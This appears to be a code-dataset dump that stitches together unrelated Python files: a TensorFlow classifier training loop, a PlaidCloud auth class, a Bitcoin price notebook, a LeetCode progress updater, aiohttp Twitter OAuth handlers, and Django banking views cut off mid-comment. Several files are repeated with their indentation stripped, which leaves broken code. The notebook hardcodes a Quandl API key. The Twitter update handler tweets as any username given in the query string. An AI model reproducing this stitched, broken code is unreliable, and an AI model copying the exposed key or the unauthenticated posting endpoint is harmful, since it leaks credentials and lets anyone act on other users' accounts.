    """Mean softmax cross-entropy between logits ``in_tensor`` and one-hot ``labels``."""
    loss = tf.reduce_mean(
        tf.nn.softmax_cross_entropy_with_logits(labels = labels,
                                                logits = in_tensor,
                                                name = 'xent'))
    return loss
def training_step(loss, global_step):
    """Build the SGD update op with staircase exponential LR decay.

    Uses the module-level hyperparameters ``starting_learning_rate``,
    ``decay_steps`` and ``decay_rate``.

    Args:
        loss: scalar loss tensor to minimize.
        global_step: non-trainable step-counter Variable.

    Returns:
        The training op; running it also increments ``global_step``.
    """
    learning_rate = tf.train.exponential_decay(starting_learning_rate,
                                               global_step = global_step,
                                               decay_steps = decay_steps,
                                               decay_rate = decay_rate,
                                               staircase=True)
    opt = tf.train.GradientDescentOptimizer(learning_rate)
    # Bug fix: global_step must be handed to minimize() so each update
    # increments it; previously it stayed at 0 forever, which froze the
    # decayed learning rate at its starting value.
    opt_op = opt.minimize(loss, global_step = global_step)
    return opt_op
"""
Run this to train the classifier. The trained model will be saved in
"./checkpoint/classification/model"
"""
if __name__ == '__main__':
    # Build the classification graph on top of the pretrained RNN
    # autoencoder, restore the autoencoder weights, then train the conv
    # classifier head.
    conv_train_graph = tf.Graph()
    data = np.load(du.np_data_fname)
    data = data[:int(len(data)*0.9)]  # NOTE(review): loaded but not used below -- confirm
    with conv_train_graph.as_default():
        # String-handle placeholders let one graph switch between the
        # train and test iterators via feed_dict.
        data_handle = tf.placeholder(tf.string, shape = [], name = 'data_handle')
        target_handle = tf.placeholder(tf.string, shape = [], name = 'labels_handle')
        data_iterator = tf.data.Iterator.from_string_handle(data_handle,
                                                            output_types = tf.float32,
                                                            output_shapes = [None, du.STEPS, du.FEATURES])
        target_iterator = tf.data.Iterator.from_string_handle(target_handle,
                                                              output_types = tf.int32,
                                                              output_shapes = [None, 2])
        train_data_iterator, train_target_iterator, \
            test_data_iterator, test_target_iterator = build_iterators()
        sequence = data_iterator.get_next()
        labels = target_iterator.get_next()
        keep_prob = tf.placeholder_with_default(1.0, shape=(),
                                                name = 'keep_prob_ph')
        # Rebuild the pretrained bidirectional RNN autoencoder so its
        # weights can be restored from ./checkpoint/model below.
        fw_cell = bd.build_fw_cell(keep_prob = keep_prob)
        bw_cell = bd.build_bw_cell(keep_prob = keep_prob)
        output, state = bd.build_rnn_autoencoder(
            fw_cell = fw_cell,
            bw_cell = bw_cell,
            input_sequence = sequence,
            sequence_lengths = du.STEPS)
        # concatenate output_fw and output_bw
        output = tf.concat(output, 2)
        # Here I obtain the predictions from the autoencoder
        predictions = bd.build_output_layer(source = output,
                                            output_dim = 9)
        # Reshape the final state of the autoencoder so that
        # shape is: [batch_size, height, width, channels]
        batch_size = tf.placeholder_with_default(bd.batch_size,
                                                 shape=(), name = 'batch_size')
        s_full = reshape_state(state, bd.num_units, batch_size)
        # Saver created before the classifier variables exist, so it
        # restores only the autoencoder weights.
        restore_rnn = tf.train.Saver()
        conv_keep_prob = tf.placeholder(shape = (), dtype = tf.float32,
                                        name = 'kp_conv_ph')
        global_step = tf.Variable(0, trainable=False)
        # Classifier head: conv+pool -> relu -> flatten -> dropout -> logits.
        pooling_output = build_conv_layers(s_full)
        relu = add_relu_activation(pooling_output)
        flat_output = flatten_layer(relu)
        do_output = add_dropout(flat_output, conv_keep_prob)
        logits = build_output_layer(do_output)
        loss = build_loss(logits, labels)
        update_step = training_step(loss, global_step)
        tf.summary.scalar('loss', loss)
        init = tf.global_variables_initializer()
        merged_summary = tf.summary.merge_all()
        # This saver sees every variable, so it checkpoints the full model.
        train_saver = tf.train.Saver()
    sess = tf.Session(graph = conv_train_graph)
    sess.run(init)
    train_data_handle, train_target_handle = sess.run([
        train_data_iterator.string_handle(),
        train_target_iterator.string_handle()])
    test_data_handle, test_target_handle = sess.run([
        test_data_iterator.string_handle(),
        test_target_iterator.string_handle()])
    sess.run([train_data_iterator.initializer,
              train_target_iterator.initializer,
              test_data_iterator.initializer,
              test_target_iterator.initializer])
    restore_rnn.restore(sess, './checkpoint/model')
    writer_1 = tf.summary.FileWriter('./checkpoint/classification/train/', conv_train_graph)
    writer_2 = tf.summary.FileWriter('./checkpoint/classification/eval/', conv_train_graph)
    for train_step in range(STEPS):
        # Every 320 steps, re-initialize the train iterators (one epoch is
        # roughly 321 batches -- see the header comment) so iteration can
        # continue past dataset exhaustion.
        if train_step%320!=0 or train_step==0:
            s, l, _ = sess.run([merged_summary, loss, update_step],
                               feed_dict = {data_handle: train_data_handle,
                                            target_handle: train_target_handle, conv_keep_prob: 0.5})
        else:
            sess.run(train_data_iterator.initializer)
            sess.run(train_target_iterator.initializer)
            s, l, _ = sess.run([merged_summary, loss, update_step],
                               feed_dict = {data_handle: train_data_handle,
                                            target_handle: train_target_handle, conv_keep_prob: 0.5})
        if train_step%100 == 0:
            # Periodic logging plus a full-test-set evaluation pass.
            writer_1.add_summary(s, train_step)
            print('Step -> %d\tLoss -> %f' % (train_step, l))
            sess.run([test_data_iterator.initializer,
                      test_target_iterator.initializer])
            # batch_size fed as 572 -- presumably the size of the 10% test
            # split; confirm against the dataset.
            s, eval_loss = sess.run([merged_summary, loss],
                                    feed_dict = {data_handle: test_data_handle,
                                                 target_handle: test_target_handle,
                                                 batch_size: 572,
                                                 conv_keep_prob: 1.0})
            writer_2.add_summary(s, train_step)
            print('Eval Loss -> %f' % eval_loss)
        if train_step%500==0:
            train_saver.save(sess,
                             './checkpoint/classification/model',
                             global_step = train_step+1)
    # Final checkpoint after the training loop completes.
    train_saver.save(sess,
                     './checkpoint/classification/model')
    writer_1.close()
writer_2.close() | 0.601711 | 0.517937 |
from __future__ import absolute_import
from plaidcloud.rpc import utc
from six import text_type
__author__ = '<NAME>'
__maintainer__ = '<NAME> <<EMAIL>>'
__copyright__ = '© Copyright 2017, Tartan Solutions, Inc'
__license__ = 'Apache 2.0'
def user_auth(*args, **kwargs):
    """Return an Auth configured for username/password login."""
    instance = Auth()
    instance.user(*args, **kwargs)
    return instance
def agent_auth(*args, **kwargs):
    """Return an Auth configured for a PlaidLink agent connection."""
    instance = Auth()
    instance.agent(*args, **kwargs)
    return instance
def transform_auth(*args, **kwargs):
    """Return an Auth configured for a transform-based connection."""
    instance = Auth()
    instance.transform(*args, **kwargs)
    return instance
def oauth2_auth(*args, **kwargs):
    """Return an Auth configured for OAuth2 token authentication."""
    instance = Auth()
    instance.oauth2(*args, **kwargs)
    return instance
class Auth(object):
    """Holds PlaidCloud connection credentials and auth state.

    One of user(), agent(), transform() or oauth2() configures the
    credentials; get_package() renders them as request headers and counts
    each call as an authentication attempt.
    """

    def __init__(self):
        """Initializes Auth object settings"""
        # Kept for backward compatibility with any external readers;
        # the getters/setters below use _status_message.
        self.status_message = ''
        # Private variables
        self._status_message = None
        self._auth_status = None
        self._auth_method = None
        self._private_key = None
        self._public_key = None
        self._mfa = None
        self._attempts = 0

    def user(self, user_name, password, multi_factor=None):
        """Used for User based connections requiring login credentials"""
        self.set_method(u'user')
        self._set_public_key(user_name)
        self._set_private_key(password)
        self._set_multi_factor(multi_factor)

    def agent(self, public_key, private_key, auth_method=u'agent'):
        """Used for PlaidLink agent based connections requiring the key information in PlaidCloud"""
        self.set_method(auth_method)
        self._set_public_key(public_key)
        self._set_private_key(private_key)

    def transform(self, task_id, session_id):
        """Transform based connection requiring the transform task_id and session_id"""
        self.set_method(u'transform')
        self._set_public_key(task_id)
        self._set_private_key(session_id)

    def oauth2(self, token):
        """oAuth2 based authentication connection"""
        self.set_method(u'oauth2')
        self._set_public_key(token)

    def is_ok(self):
        """Return True when the auth status has been set to 'ok'."""
        return self._auth_status == u'ok'

    def get_status_message(self):
        """Return the last status message (None until set)."""
        return self._status_message

    def get_attempts(self):
        """Number of times get_package() has been called."""
        return int(self._attempts)

    def get_method(self):
        """Return the configured auth method, or None."""
        return self._auth_method

    def get_auth_status(self):
        """Return the current auth status, or None."""
        return self._auth_status

    def set_status_message(self, value):
        self._status_message = text_type(value)

    def set_method(self, value):
        """Set the auth method; raises on anything but the four known methods."""
        if value in (u'user', u'agent', u'transform', u'oauth2'):
            self._auth_method = value
        else:
            raise Exception("Invalid Authentication Method Specified")

    def set_status(self, value):
        """Set the auth status; raises on unknown states.

        Bug fix: this previously assigned ``self.status``, which nothing
        else reads, so is_ok()/get_auth_status() could never reflect the
        status.  It now writes ``self._auth_status``.
        """
        if value in (u'setup', u'ready', u'ok', u'fail'):
            self._auth_status = value
        else:
            raise Exception("Invalid Authentication Status Specified")

    def _set_private_key(self, value):
        self._private_key = text_type(value)

    def _set_public_key(self, value):
        self._public_key = text_type(value)

    def _set_multi_factor(self, value):
        self._mfa = value

    def _get_private_key(self):
        return self._private_key

    def _get_public_key(self):
        return self._public_key

    def _get_mfa(self):
        return self._mfa

    def _increment_attempts(self):
        self._attempts += 1

    def get_package(self):
        """Render the credentials as PlaidCloud request headers.

        Side effect: increments the attempt counter on every call.
        """
        package = {
            'PlaidCloud-Auth-Method': str(self.get_method()),
            'PlaidCloud-Key': str(self._get_public_key()),
            'PlaidCloud-Pass': str(self._get_private_key()),
            'PlaidCloud-MFA': str(self._get_mfa()),
            'PlaidCloud-Timestamp': str(utc.timestamp())
        }
        self._increment_attempts()
        return package
from __future__ import absolute_import
from plaidcloud.rpc import utc
from six import text_type
__author__ = '<NAME>'
__maintainer__ = '<NAME> <<EMAIL>>'
__copyright__ = '© Copyright 2017, Tartan Solutions, Inc'
__license__ = 'Apache 2.0'
def user_auth(*args, **kwargs):
auth = Auth()
auth.user(*args, **kwargs)
return auth
def agent_auth(*args, **kwargs):
auth = Auth()
auth.agent(*args, **kwargs)
return auth
def transform_auth(*args, **kwargs):
auth = Auth()
auth.transform(*args, **kwargs)
return auth
def oauth2_auth(*args, **kwargs):
auth = Auth()
auth.oauth2(*args, **kwargs)
return auth
class Auth(object):
def __init__(self):
"""Initializes Auth object settings"""
self.status_message = ''
# Private variables
self._status_message = None
self._auth_status = None
self._auth_method = None
self._private_key = None
self._public_key = None
self._mfa = None
self._attempts = 0
def user(self, user_name, password, multi_factor=None):
"""Used for User based connections requiring login credentials"""
self.set_method(u'user')
self._set_public_key(user_name)
self._set_private_key(password)
self._set_multi_factor(multi_factor)
def agent(self, public_key, private_key, auth_method=u'agent'):
"""Used for PlaidLink agent based connections requireing the key information in PlaidCloud"""
self.set_method(auth_method)
self._set_public_key(public_key)
self._set_private_key(private_key)
def transform(self, task_id, session_id):
"""Transform based connection requiring the transform task_id and session_id"""
self.set_method(u'transform')
self._set_public_key(task_id)
self._set_private_key(session_id)
def oauth2(self, token):
"""oAuth2 based authentication connection"""
self.set_method(u'oauth2')
self._set_public_key(token)
def is_ok(self):
return self._auth_status == u'ok'
def get_status_message(self):
return self._status_message
def get_attempts(self):
return int(self._attempts)
def get_method(self):
return self._auth_method
def get_auth_status(self):
return self._auth_status
def set_status_message(self, value):
self._status_message = text_type(value)
def set_method(self, value):
if value in (u'user', u'agent', u'transform', u'oauth2'):
self._auth_method = value
else:
raise Exception("Invalid Authentication Method Specified")
def set_status(self, value):
if value in (u'setup', u'ready', u'ok', u'fail'):
self.status = value
else:
raise Exception("Invalid Authentication Status Specified")
def _set_private_key(self, value):
self._private_key = text_type(value)
def _set_public_key(self, value):
self._public_key = text_type(value)
def _set_multi_factor(self, value):
self._mfa = value
def _get_private_key(self):
return self._private_key
def _get_public_key(self):
return self._public_key
def _get_mfa(self):
return self._mfa
def _increment_attempts(self):
self._attempts += 1
def get_package(self):
package = {
'PlaidCloud-Auth-Method': str(self.get_method()),
'PlaidCloud-Key': str(self._get_public_key()),
'PlaidCloud-Pass': str(self._get_private_key()),
'PlaidCloud-MFA': str(self._get_mfa()),
'PlaidCloud-Timestamp': str(utc.timestamp())
}
self._increment_attempts()
return package | 0.794624 | 0.075551 |
# In[4]:
import os
import numpy as np
import pickle
import quandl
import pandas as pd
import plotly.offline as py
import plotly.graph_objs as go
py.init_notebook_mode(connected=True)
# In[5]:
quandl.ApiConfig.api_key = 'tWWv7RoNKzyaxKKRnc8d'
# In[10]:
def get_quandl_data(quandl_code):
    """Download a Quandl dataset as a DataFrame, caching it as a pickle.

    Args:
        quandl_code: Quandl dataset code, e.g. 'BCHARTS/KRAKENUSD'.
        The cache file name is the code with '/' replaced by '-'.

    Returns:
        pandas.DataFrame with the dataset, from cache when available.
    """
    cache_path = '{}.pkl'.format(quandl_code).replace('/', '-')
    try:
        # 'with' closes the handle (the original leaked it).
        with open(cache_path, 'rb') as f:
            df = pickle.load(f)
        print('Loaded {} from cache'.format(quandl_code))
    except (OSError, IOError):
        df = quandl.get(quandl_code, returns="pandas")
        df.to_pickle(cache_path)
        # Bug fix: the original wrote print('...').format(...), calling
        # .format on print's None return -> AttributeError on every
        # cache miss (after the cache file was already written).
        print('Cached {} at {}'.format(quandl_code, cache_path))
    return df
# In[11]:
# Pull the Kraken BTC/USD series (cached locally as a pickle).
btc_usd_kraken = get_quandl_data('BCHARTS/KRAKENUSD')
# In[12]:
btc_usd_kraken.head()
# In[13]:
# Sanity plot of the volume-weighted price.
btc_trace = go.Scatter(x=btc_usd_kraken.index,y=btc_usd_kraken['Weighted Price'])
py.iplot([btc_trace])
# In[18]:
# Fetch the same series from three more exchanges, keyed by exchange name.
exchanges = ['COINBASE','BITSTAMP','ITBIT']
exchange_data = {}
exchange_data['KRAKEN'] = btc_usd_kraken
for exchange in exchanges:
    exchange_code = 'BCHARTS/{}USD'.format(exchange)
    btc_exchange_df = get_quandl_data(exchange_code)
    exchange_data[exchange] = btc_exchange_df
# In[20]:
def merge_dfs(dataframes, labels, col):
    """Merge one column from each dataframe into a single dataframe.

    Args:
        dataframes: sequence of pandas DataFrames.
        labels: result column names, parallel to ``dataframes``.
        col: the column to extract from each input dataframe.

    Returns:
        DataFrame with one column per input, aligned on index.
    """
    # zip pairs each label with its dataframe directly, replacing the
    # range(len(...)) index-juggling of the original.
    series_dict = {label: frame[col] for label, frame in zip(labels, dataframes)}
    return pd.DataFrame(series_dict)
# In[21]:
# Combine the per-exchange 'Weighted Price' series into one dataframe,
# one column per exchange.
btc_usd_df = merge_dfs(list(exchange_data.values()),list(exchange_data.keys()), 'Weighted Price')
# In[22]:
btc_usd_df.head()
# In[29]:
# Overlay all exchanges on a single time-series chart.
layout = go.Layout(
    title = 'Bitcoin Price By Exchange (USD)',
    legend = {'orientation':'h'},
    xaxis = {'type':'date'},
    yaxis = {'title':'Price in USD'}
)
trace_arr = []
labels = list(btc_usd_df)  # column names, i.e. the exchange labels
for index,label in enumerate(labels):
    series = btc_usd_df[label]
    trace = go.Scatter(x=series.index, y=series, name=label)
    trace_arr.append(trace)
fig = go.Figure(data=trace_arr, layout=layout)
py.iplot(fig)
# In[30]:
# Row-wise mean across exchanges gives an aggregate USD price series.
btc_usd_df['avg_usd_price'] = btc_usd_df.mean(axis=1)
btc_trace = go.Scatter(x=btc_usd_df.index, y=btc_usd_df['avg_usd_price'])
py.iplot([btc_trace]) | Bitcoin Cryptocurrency Price Visualization.py |
# In[4]:
import os
import numpy as np
import pickle
import quandl
import pandas as pd
import plotly.offline as py
import plotly.graph_objs as go
py.init_notebook_mode(connected=True)
# In[5]:
quandl.ApiConfig.api_key = 'tWWv7RoNKzyaxKKRnc8d'
# In[10]:
def get_quandl_data(quandl_code):
    """Download a Quandl dataset as a DataFrame, caching it as a pickle.

    Args:
        quandl_code: Quandl dataset code, e.g. 'BCHARTS/KRAKENUSD'.
        The cache file name is the code with '/' replaced by '-'.

    Returns:
        pandas.DataFrame with the dataset, from cache when available.
    """
    cache_path = '{}.pkl'.format(quandl_code).replace('/', '-')
    try:
        # 'with' closes the handle (the original leaked it).
        with open(cache_path, 'rb') as f:
            df = pickle.load(f)
        print('Loaded {} from cache'.format(quandl_code))
    except (OSError, IOError):
        df = quandl.get(quandl_code, returns="pandas")
        df.to_pickle(cache_path)
        # Bug fix: the original wrote print('...').format(...), calling
        # .format on print's None return -> AttributeError on every
        # cache miss (after the cache file was already written).
        print('Cached {} at {}'.format(quandl_code, cache_path))
    return df
# In[11]:
btc_usd_kraken = get_quandl_data('BCHARTS/KRAKENUSD')
# In[12]:
btc_usd_kraken.head()
# In[13]:
btc_trace = go.Scatter(x=btc_usd_kraken.index,y=btc_usd_kraken['Weighted Price'])
py.iplot([btc_trace])
# In[18]:
exchanges = ['COINBASE','BITSTAMP','ITBIT']
exchange_data = {}
exchange_data['KRAKEN'] = btc_usd_kraken
for exchange in exchanges:
exchange_code = 'BCHARTS/{}USD'.format(exchange)
btc_exchange_df = get_quandl_data(exchange_code)
exchange_data[exchange] = btc_exchange_df
# In[19]:
exchange_data
# In[20]:
def merge_dfs(dataframes, labels, col):
    """Merge one column from each dataframe into a single dataframe.

    Args:
        dataframes: sequence of pandas DataFrames.
        labels: result column names, parallel to ``dataframes``.
        col: the column to extract from each input dataframe.

    Returns:
        DataFrame with one column per input, aligned on index.
    """
    # zip pairs each label with its dataframe directly, replacing the
    # range(len(...)) index-juggling of the original.
    series_dict = {label: frame[col] for label, frame in zip(labels, dataframes)}
    return pd.DataFrame(series_dict)
# In[21]:
btc_usd_df = merge_dfs(list(exchange_data.values()),list(exchange_data.keys()), 'Weighted Price')
# In[22]:
btc_usd_df.head()
# In[29]:
layout = go.Layout(
title = 'Bitcoin Price By Exchange (USD)',
legend = {'orientation':'h'},
xaxis = {'type':'date'},
yaxis = {'title':'Price in USD'}
)
trace_arr = []
labels = list(btc_usd_df)
for index,label in enumerate(labels):
series = btc_usd_df[label]
trace = go.Scatter(x=series.index, y=series, name=label)
trace_arr.append(trace)
fig = go.Figure(data=trace_arr, layout=layout)
py.iplot(fig)
# In[30]:
btc_usd_df['avg_usd_price'] = btc_usd_df.mean(axis=1)
btc_trace = go.Scatter(x=btc_usd_df.index, y=btc_usd_df['avg_usd_price'])
py.iplot([btc_trace]) | 0.392337 | 0.267617 |
import os
import fnmatch
import fileinput
import json
import re
import urllib.request
def getTestsCount():
testDir = "tests"
testFilePattern = r'test_a*.py'
count = 0
for file in fnmatch.filter(os.listdir(testDir), testFilePattern):
if file == 'test_a0000blank.py':
continue
testFile = os.path.join(testDir, file)
text = open(testFile, "r")
for line in text:
if re.match("def test_*", line):
count += 1
return count
def getSolutionsCount():
    """Count solution files solutions/a*.py, excluding the blank template."""
    names = fnmatch.filter(os.listdir("solutions"), r'a*.py')
    return sum(1 for name in names if name != 'a0000blank.py')
def getAlgorithmsCount():
    """Fetch the total number of LeetCode algorithm problems.

    Queries the public LeetCode problems API with browser-like headers
    (the endpoint rejects the default urllib user agent) and returns the
    'num_total' field of the JSON payload.
    """
    headers = {
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1)'
                      ' AppleWebKit/537.36 (KHTML, like Gecko)'
                      ' Chrome/78.0.3904.97 Safari/537.366'
    }
    url = "https://leetcode.com/api/problems/algorithms/"
    request = urllib.request.Request(url=url, headers=headers)
    # Close the HTTP response deterministically (the original leaked it).
    with urllib.request.urlopen(request) as response:
        obj = json.loads(response.read().decode('utf-8'))
    return obj['num_total']
def updateReadeMe(solutions, tests, total):
    """Rewrite the progress/tests badge URLs in README.md in place.

    Args:
        solutions: number of solved problems.
        tests: number of test functions.
        total: total problem count; values <= 1000 are treated as a
            bogus API response and nothing is written.

    Badge colour encodes completion: >80% 'success', >50% 'important',
    otherwise 'critical'.
    """
    readme_path = "README.md"
    if total > 1000:
        print("Progress: " + str(solutions) + " / " + str(total))
        ratio = solutions / total
        if ratio > 0.8:
            color = 'success'
        elif ratio > 0.5:
            color = 'important'
        else:
            color = 'critical'
        newStatus = 'Progress-' + str(solutions) + '%2F' + str(total) + '-' + color + '.svg'
        testStatus = 'Tests-' + str(tests) + '-' + 'success.svg'
        # FileInput(inplace=True) redirects print() into the file, so the
        # loop rewrites README.md line by line; 'with' closes it.  The
        # original reused the name 'file' for both the path and the
        # FileInput object (shadowing the builtin as well).
        with fileinput.FileInput(readme_path, inplace=True) as readme:
            for line in readme:
                # '-' and '%' need no escaping in a regex; the original
                # patterns used confusing escapes (\- and \%).
                line = re.sub(r"Progress-\d+%2F\d+-.+\.svg", newStatus, line)
                line = re.sub(r"Tests-\d+-.+\.svg", testStatus, line)
                print(line, end='')
    else:
        # Guard against a failed/garbage API response.
        print("FIXME: some error occurs!!!")
# Module-level driver: recompute the counts on every run so the README
# badges can be refreshed with current numbers.
tests = getTestsCount()
solutions = getSolutionsCount()
total = getAlgorithmsCount()
updateReadeMe(solutions, tests, total) | progress.py |
import os
import fnmatch
import fileinput
import json
import re
import urllib.request
def getTestsCount():
testDir = "tests"
testFilePattern = r'test_a*.py'
count = 0
for file in fnmatch.filter(os.listdir(testDir), testFilePattern):
if file == 'test_a0000blank.py':
continue
testFile = os.path.join(testDir, file)
text = open(testFile, "r")
for line in text:
if re.match("def test_*", line):
count += 1
return count
def getSolutionsCount():
dirpath = "solutions"
pattern = r'a*.py'
solutions = [solution for solution in fnmatch.filter(os.listdir(dirpath), pattern) if solution != 'a0000blank.py']
return len(solutions)
def getAlgorithmsCount():
headers = {
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1)'
' AppleWebKit/537.36 (KHTML, like Gecko)'
' Chrome/78.0.3904.97 Safari/537.366'
}
url = "https://leetcode.com/api/problems/algorithms/"
request = urllib.request.Request(url=url, headers=headers)
response = urllib.request.urlopen(request)
obj = json.loads(response.read().decode('utf-8'))
return obj['num_total']
def updateReadeMe(solutions, tests, total):
file = "README.md"
if total > 1000:
print("Progress: " + str(solutions) + " / " + str(total))
ratio = solutions / total
if ratio > 0.8:
color = 'success'
elif ratio > 0.5:
color = 'important'
else:
color = 'critical'
newStatus = 'Progress-' + str(solutions) + '%2F' + str(total) + '-' + color + '.svg'
testStatus = 'Tests-' + str(tests) + '-' + 'success.svg'
with fileinput.FileInput(file, inplace=True) as file:
for line in file:
line = re.sub(r"Progress\-\d+\%2F\d+\-.+\.svg", newStatus, line)
line = re.sub(r"Tests\-\d+\-.+\.svg", testStatus, line)
print(line, end='')
else:
print("FIXME: some error occurs!!!")
tests = getTestsCount()
solutions = getSolutionsCount()
total = getAlgorithmsCount()
updateReadeMe(solutions, tests, total) | 0.443118 | 0.113138 |
import uuid
from aiohttp import web
from aiohttp_session import get_session
from twython import Twython
from cursed.parrot import db
async def twitter_authorize(request):
    """Start the Twitter OAuth1 flow.

    Obtains request tokens from Twitter, stores them in a placeholder
    user record (looked up by oauth_token in twitter_callback), and
    redirects the browser to Twitter's authorization URL.
    """
    app = request.app
    auth = app['twitter'].get_authentication_tokens(
        callback_url=app['settings']['twitter']['callback_url']
    )
    # Persist the temporary token pair so the callback can find it.
    await db.create_user(
        app,
        {
            'uuid': uuid.uuid4().hex,
            'oauth_token': auth['oauth_token'],
            'oauth_token_secret': auth['oauth_token_secret']
        }
    )
    return web.HTTPFound(
        location=auth['auth_url']
    )
async def twitter_callback(request):
    """Complete the Twitter OAuth1 flow and log the user in.

    Exchanges the request token plus verifier for access tokens, fetches
    the Twitter profile, fills in the placeholder record created by
    twitter_authorize, stores the screen name in the session, and
    redirects home.
    """
    app = request.app
    oauth_token = request.query['oauth_token']
    oauth_verifier = request.query['oauth_verifier']
    # Placeholder record created in twitter_authorize, keyed by the
    # request token.
    user = await db.get_user_by_token(app, oauth_token)
    twitter = Twython(
        **app['settings']['twitter']['tokens'],
        oauth_token=oauth_token, oauth_token_secret=user.oauth_token_secret
    )
    # Trade the request token + verifier for permanent access tokens.
    final_step = twitter.get_authorized_tokens(oauth_verifier)
    twitter = Twython(
        **app['settings']['twitter']['tokens'],
        oauth_token=final_step['oauth_token'],
        oauth_token_secret=final_step['oauth_token_secret']
    )
    profile = twitter.verify_credentials()
    user = await db.get_user(app, profile['screen_name'])
    # NOTE(review): the placeholder is upgraded only when no user exists
    # under this screen name; returning users keep their stored tokens --
    # confirm this is the intended behaviour.
    if not user:
        user = await db.update_user(
            app,
            oauth_token,
            {
                'oauth_token': final_step['oauth_token'],
                'oauth_token_secret': final_step['oauth_token_secret'],
                'fullname': profile['name'],
                'username': profile['screen_name']
            }
        )
    session = await get_session(request)
    session['username'] = profile['screen_name']
    return web.HTTPFound(
        location=app.router['home'].url_for()
    )
async def twitter_update(request):
    """Post a status update on behalf of the given username.

    Looks up the stored OAuth tokens for ``username`` and, when a record
    exists, tweets ``status``.  Always responds with the text 'Stay!'.
    """
    app = request.app
    status = request.query['status']
    username = request.query['username']
    account = await db.get_user(app, username)
    if account:
        client = Twython(
            **app['settings']['twitter']['tokens'],
            oauth_token=account.oauth_token,
            oauth_token_secret=account.oauth_token_secret
        )
        client.update_status(status=status)
    return web.Response(text='Stay!')
from aiohttp import web
from aiohttp_session import get_session
from twython import Twython
from cursed.parrot import db
async def twitter_authorize(request):
app = request.app
auth = app['twitter'].get_authentication_tokens(
callback_url=app['settings']['twitter']['callback_url']
)
await db.create_user(
app,
{
'uuid': uuid.uuid4().hex,
'oauth_token': auth['oauth_token'],
'oauth_token_secret': auth['oauth_token_secret']
}
)
return web.HTTPFound(
location=auth['auth_url']
)
async def twitter_callback(request):
app = request.app
oauth_token = request.query['oauth_token']
oauth_verifier = request.query['oauth_verifier']
user = await db.get_user_by_token(app, oauth_token)
twitter = Twython(
**app['settings']['twitter']['tokens'],
oauth_token=oauth_token, oauth_token_secret=user.oauth_token_secret
)
final_step = twitter.get_authorized_tokens(oauth_verifier)
twitter = Twython(
**app['settings']['twitter']['tokens'],
oauth_token=final_step['oauth_token'],
oauth_token_secret=final_step['oauth_token_secret']
)
profile = twitter.verify_credentials()
user = await db.get_user(app, profile['screen_name'])
if not user:
user = await db.update_user(
app,
oauth_token,
{
'oauth_token': final_step['oauth_token'],
'oauth_token_secret': final_step['oauth_token_secret'],
'fullname': profile['name'],
'username': profile['screen_name']
}
)
session = await get_session(request)
session['username'] = profile['screen_name']
return web.HTTPFound(
location=app.router['home'].url_for()
)
async def twitter_update(request):
    """Post *status* to Twitter on behalf of *username*.

    Looks the user up by name and, when found, tweets using the user's
    stored OAuth tokens. Always responds with the text 'Stay!'.

    NOTE(review): status/username arrive as GET query parameters and the
    session is not checked here -- confirm upstream middleware restricts
    who may call this endpoint.
    """
    app = request.app
    status = request.query['status']
    username = request.query['username']
    user = await db.get_user(app, username)
    if user:
        twitter = Twython(
            **app['settings']['twitter']['tokens'],
            oauth_token=user.oauth_token,
            oauth_token_secret=user.oauth_token_secret
        )
        twitter.update_status(status=status)
    # Trailing dataset artifact removed from the original final line.
    return web.Response(text='Stay!')
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404, redirect, render
from django.contrib.auth.models import User
from django.views import View
from .models import BankAccount, Transaction
from .forms import BankAccountForm, RegistrationForm, TransactionForm
from django.core.paginator import Paginator
from django.db.models import Q
from django.contrib.auth import authenticate, login
from django.contrib.auth.decorators import login_required
# Create your views here.
class LoginView(View):
    """Username/password login; staff land on /admin, everyone else on /."""

    def post(self, request):
        """Authenticate the submitted credentials and redirect on success."""
        user = authenticate(
            request,
            username=request.POST["username"],
            password=request.POST["password"],
        )
        if user is None:
            # Bad credentials: show the login form again.
            return render(request, "bank_account/login.html")
        login(request, user)
        destination = "/admin" if user.is_staff else "/"
        return HttpResponseRedirect(destination)

    def get(self, request):
        """Render the login form."""
        return render(request, "bank_account/login.html")
def user_create(request):
    """Register a new user from the RegistrationForm.

    On valid POST creates the user (create_user hashes the password) and
    redirects to the bank-account list; otherwise renders the form, bound
    on an invalid POST so errors are displayed.
    """
    if request.method == "POST":
        registration_form = RegistrationForm(request.POST)
        if registration_form.is_valid():
            username = registration_form.cleaned_data["username"]
            password = registration_form.cleaned_data["password"]
            email = registration_form.cleaned_data["email"]
            user = User.objects.create_user(username, email, password)
            user.first_name = registration_form.cleaned_data["first_name"]
            user.last_name = registration_form.cleaned_data["last_name"]
            # The original also stashed the raw password on the instance
            # (user.password2). That attribute is not a model field, so it
            # was never persisted and only kept the plaintext password in
            # memory; it has been dropped.
            user.save()
            return redirect("list_bank_accounts")
    else:
        # GET: unbound form (the original needlessly built a bound form
        # first and discarded it).
        registration_form = RegistrationForm()
    return render(
        request,
        "bank_account/registration.html",
        {
            "registration_form": registration_form,
        },
    )
@login_required
def list_users(request):
    """List all other users, optionally filtered by a search term.

    GET parameter ``search_term`` matches username/email/first/last name
    (case-insensitive substring). Results are paginated 10 per page.
    """
    queryset = User.objects.all().order_by("-id")
    # Hide the requesting user from the listing.
    if not request.user.is_anonymous:
        queryset = queryset.exclude(username=request.user.username)
    if request.GET.get("search_term"):
        search_term = request.GET.get("search_term")
        queryset = queryset.filter(
            Q(username__icontains=search_term)
            | Q(email__icontains=search_term)
            | Q(first_name__icontains=search_term)
            | Q(last_name__icontains=search_term)
        )
    paginator = Paginator(queryset, 10)
    page_number = request.GET.get("page")
    page_obj = paginator.get_page(page_number)
    context = {
        "users": page_obj,
    }
    return render(request, "bank_account/users.html", context)
@login_required
def make_transaction(request, pk):
    """Transfer money from the current user's accounts into account *pk*.

    The target account is credited with the full amount; each source
    account selected in the form is debited an equal share.
    """
    bank_account = get_object_or_404(BankAccount, pk=pk)
    current_user = request.user if not request.user.is_anonymous else None
    form = TransactionForm(data=request.POST, user=current_user)
    if request.method == "POST":
        if form.is_valid():
            transaction = form.save(commit=False)
            transaction.sender = current_user
            transaction.recipient = bank_account.owner
            transaction.amount = form.cleaned_data["amount"]
            transaction.recipient_bank_account = bank_account
            if transaction.amount:
                # Credit the target account first...
                bank_account.amount += transaction.amount
                bank_account.save()
                # ...then debit each selected source account its equal share.
                # NOTE(review): these balance updates are not wrapped in
